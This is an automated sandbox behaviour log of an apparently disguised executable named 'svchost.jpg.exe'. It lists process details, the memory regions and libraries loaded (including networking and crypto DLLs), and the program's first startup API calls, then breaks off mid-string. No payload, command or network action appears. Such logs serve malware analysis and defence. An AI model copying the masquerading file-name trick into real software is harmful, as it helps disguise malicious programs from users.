# Flog Txt Version 1 # Analyzer Version: 2.3.2 # Analyzer Build Date: Nov 29 2018 14:58:43 # Log Creation Date: 04.01.2019 10:33:09.019 Process: id = "1" image_name = "svchost.jpg.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\svchost.jpg.exe" page_root = "0x5051b000" os_pid = "0x964" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\svchost.jpg.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 6 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7 start_va = 0x280000 end_va = 0x2f0fff entry_point = 0x280000 region_type = mapped_file name = "svchost.jpg.exe" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\svchost.jpg.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\svchost.jpg.exe") Region: id = 8 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 9 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10 start_va = 0x77850000 end_va = 0x779cffff entry_point = 0x77850000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 12 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 13 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 14 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 15 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 16 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 17 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 150 start_va = 0x770000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 151 start_va = 0x74d90000 end_va = 0x74d97fff entry_point = 0x74d90000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 152 start_va = 0x74da0000 end_va = 0x74dfbfff entry_point = 0x74da0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 153 start_va = 0x74e00000 end_va = 0x74e3efff entry_point = 0x74e00000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 154 start_va = 0x9b0000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 155 start_va = 0x75a20000 end_va = 0x75b2ffff entry_point = 0x75a20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 156 start_va = 0x765f0000 end_va = 0x76635fff entry_point = 0x765f0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 157 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x0 region_type = private name = "private_0x0000000077450000" filename = "" Region: id = 158 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x0 region_type = private name = "private_0x0000000077550000" filename = "" Region: id = 159 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 160 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 161 start_va = 0x75160000 end_va = 0x75166fff entry_point = 0x75160000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 162 start_va = 0x75170000 end_va = 0x7518bfff entry_point = 0x75170000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 163 start_va = 0x75190000 end_va = 0x751defff entry_point = 0x75190000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 164 start_va = 0x751e0000 end_va = 0x75237fff entry_point = 0x751e0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 165 start_va = 0x75240000 end_va = 0x7524efff entry_point = 0x75240000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 166 start_va = 0x75250000 end_va = 0x75268fff entry_point = 0x75250000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 167 start_va = 0x75270000 end_va = 0x75278fff entry_point = 0x75270000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 168 start_va = 0x75280000 end_va = 0x75290fff entry_point = 0x75280000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 169 start_va = 0x753a0000 end_va = 0x753abfff entry_point = 0x753a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 170 start_va = 0x753b0000 end_va = 0x7540ffff entry_point = 0x753b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 171 start_va = 0x75b30000 end_va = 0x75bcffff entry_point = 0x75b30000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 172 start_va = 0x75e30000 end_va = 0x75edbfff entry_point = 0x75e30000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 173 start_va = 0x762b0000 end_va = 0x762c8fff entry_point = 0x762b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 174 start_va = 0x764c0000 end_va = 0x764f4fff entry_point = 0x764c0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 175 start_va = 0x772d0000 end_va = 0x773bffff entry_point = 0x772d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 176 start_va = 0x77820000 end_va = 0x77825fff entry_point = 0x77820000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 177 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 178 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 179 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1167 start_va = 0x75ce0000 end_va = 0x75d36fff entry_point = 0x75ce0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1168 start_va = 0x773c0000 end_va = 0x7744ffff entry_point = 0x773c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1169 start_va = 0x756f0000 end_va = 0x757effff entry_point = 0x756f0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1170 start_va = 0x762d0000 end_va = 0x762d9fff entry_point = 0x762d0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1171 start_va = 0x75410000 end_va = 0x754acfff entry_point = 0x75410000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1172 start_va = 0xe0000 end_va = 0xfdfff entry_point = 0xe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1173 start_va = 0x300000 end_va = 0x487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 1174 start_va = 0xe0000 end_va = 0xfdfff entry_point = 0xe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1175 start_va = 0x76500000 end_va = 0x7655ffff entry_point = 0x76500000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1176 start_va = 0x75d40000 end_va = 0x75e0bfff entry_point = 0x75d40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1177 start_va = 0x5b0000 end_va = 0x730fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1178 start_va = 0xab0000 end_va = 0x1eaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 1179 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1180 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1181 start_va = 0x1eb0000 end_va = 0x217efff entry_point = 0x1eb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1182 start_va = 0xf0000 end_va = 0xf6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1183 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1184 start_va = 0x220000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1185 start_va = 0x890000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 1186 start_va = 0x2180000 end_va = 0x223ffff entry_point = 0x2180000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1187 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1188 start_va = 0x74ea0000 end_va = 0x74eb5fff entry_point = 0x74ea0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1189 start_va = 0x75100000 end_va = 0x75107fff entry_point = 0x75100000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 1190 start_va = 0x75050000 end_va = 0x7508bfff entry_point = 0x75050000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1191 start_va = 0x2240000 end_va = 0x243ffff entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 1192 start_va = 0x75040000 end_va = 0x75044fff entry_point = 0x75040000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1193 start_va = 0x75030000 end_va = 0x75035fff entry_point = 0x75030000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1194 start_va = 0x74fe0000 end_va = 0x75023fff entry_point = 0x74fe0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1195 start_va = 0x2240000 end_va = 0x236ffff entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 1196 start_va = 0x2400000 end_va = 0x243ffff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1197 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1198 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1199 start_va = 0x25c0000 end_va = 0x26bffff entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 1200 start_va = 0x26f0000 end_va = 0x27effff entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 1201 start_va = 0x74fd0000 end_va = 0x74fd5fff entry_point = 0x74fd0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1202 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1203 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1204 start_va = 0x74f90000 end_va = 0x74fc7fff entry_point = 0x74f90000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1229 start_va = 0x830000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 1230 start_va = 0x2580000 end_va = 0x25bffff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1231 start_va = 0x2920000 end_va = 0x2a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 1232 start_va = 0x74f50000 end_va = 0x74f89fff entry_point = 0x74f50000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1233 start_va = 0x76190000 end_va = 0x762acfff entry_point = 0x76190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1234 start_va = 0x772c0000 end_va = 0x772cbfff entry_point = 0x772c0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1235 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1236 start_va = 0x74f40000 end_va = 0x74f47fff entry_point = 0x74f40000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1237 start_va = 0x74cc0000 end_va = 0x74cd6fff entry_point = 0x74cc0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1238 start_va = 0x74ed0000 end_va = 0x74f07fff entry_point = 0x74ed0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1239 start_va = 0x74c80000 end_va = 0x74cbcfff entry_point = 0x74c80000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1240 start_va = 0x2490000 end_va = 0x24cffff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 1241 start_va = 0x2a20000 end_va = 0x2e12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a20000" filename = "" Region: id = 1242 start_va = 0x2f20000 end_va = 0x301ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f20000" filename = "" Region: id = 1243 start_va = 0x74c60000 end_va = 0x74c76fff entry_point = 0x74c60000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1244 start_va = 0x74ec0000 end_va = 0x74ecafff entry_point = 0x74ec0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1245 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1246 start_va = 0x27f0000 end_va = 0x28effff entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 1247 start_va = 0x74c40000 end_va = 0x74c55fff entry_point = 0x74c40000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 1248 start_va = 0x74e60000 end_va = 0x74e9afff entry_point = 0x74e60000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1249 start_va = 0x74ea0000 end_va = 0x74eb5fff entry_point = 0x74ea0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1250 start_va = 0x22d0000 end_va = 0x230ffff entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 1251 start_va = 0x2330000 end_va = 0x236ffff entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 1252 start_va = 0x2e20000 end_va = 0x2f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 1253 start_va = 0x3170000 end_va = 0x326ffff entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 1254 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1255 start_va = 0x2380000 end_va = 0x23bffff entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 1256 start_va = 0x3370000 end_va = 0x346ffff entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 1257 start_va = 0x74c20000 end_va = 0x74c31fff entry_point = 0x74c20000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1258 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1259 start_va = 0x24d0000 end_va = 0x250ffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1260 start_va = 0x34a0000 end_va = 0x359ffff entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 1261 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 1262 start_va = 0x30a0000 end_va = 0x30dffff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 1263 start_va = 0x35f0000 end_va = 0x36effff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 1264 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 1752 start_va = 0x26c0000 end_va = 0x26fffff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 1753 start_va = 0x3820000 end_va = 0x391ffff entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 1754 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Thread: id = 1 os_tid = 0x968 [0019.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af9f4 | out: lpSystemTimeAsFileTime=0x5af9f4*(dwLowDateTime=0xed5fbd80, dwHighDateTime=0x1d4a418)) [0019.633] GetCurrentThreadId () returned 0x968 [0019.633] GetCurrentProcessId () returned 0x964 [0019.633] QueryPerformanceCounter (in: lpPerformanceCount=0x5af9ec | out: lpPerformanceCount=0x5af9ec*=1809533000000) returned 1 [0019.634] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0019.635] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0019.635] GetLastError () returned 0x57 [0019.635] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0019.635] GetLastError () returned 0x57 [0019.635] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x75a20000 [0019.636] GetProcAddress (hModule=0x75a20000, lpProcName=0x2cc2d4) returned 0x75a34d28 [0019.636] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0019.636] GetLastError () returned 0x57 [0019.636] GetProcAddress (hModule=0x75a20000, lpProcName="FlsAlloc") returned 0x75a34f2b [0019.636] GetProcAddress (hModule=0x75a20000, lpProcName="FlsSetValue") returned 0x75a34208 [0019.639] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0019.639] GetLastError () returned 0x57 [0019.639] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0019.639] GetLastError () returned 0x57 [0019.639] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x75a20000 [0019.639] GetProcAddress (hModule=0x75a20000, lpProcName="InitializeCriticalSectionEx") returned 0x75a34d28 [0019.639] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0019.639] GetLastError () returned 0x57 [0019.639] GetProcAddress (hModule=0x75a20000, lpProcName="FlsAlloc") returned 0x75a34f2b [0019.639] GetLastError () returned 0x57 [0019.640] GetProcAddress (hModule=0x75a20000, lpProcName="FlsGetValue") returned 0x75a31252 [0019.640] GetProcAddress (hModule=0x75a20000, lpProcName="FlsSetValue") returned 0x75a34208 [0019.640] SetLastError (dwErrCode=0x57) [0019.642] GetStartupInfoW (in: lpStartupInfo=0x5af92c | out: lpStartupInfo=0x5af92c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\svchost.jpg.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2aa330, hStdOutput=0xbc6db7dd, hStdError=0xfffffffe)) [0019.642] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0019.642] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0019.642] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0019.642] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\svchost.jpg.exe\" " [0019.642] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\svchost.jpg.exe\" " [0019.643] GetACP () returned 0x4e4 [0019.643] IsValidCodePage (CodePage=0x4e4) returned 1 [0019.643] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x5af94c | out: lpCPInfo=0x5af94c) returned 1 [0019.643] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x5af214 | out: lpCPInfo=0x5af214) returned 1 [0019.643] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x5af828, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0019.644] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x5af828, cbMultiByte=256, lpWideCharStr=0x5aefb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ냪+Ā") returned 256 [0019.644] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 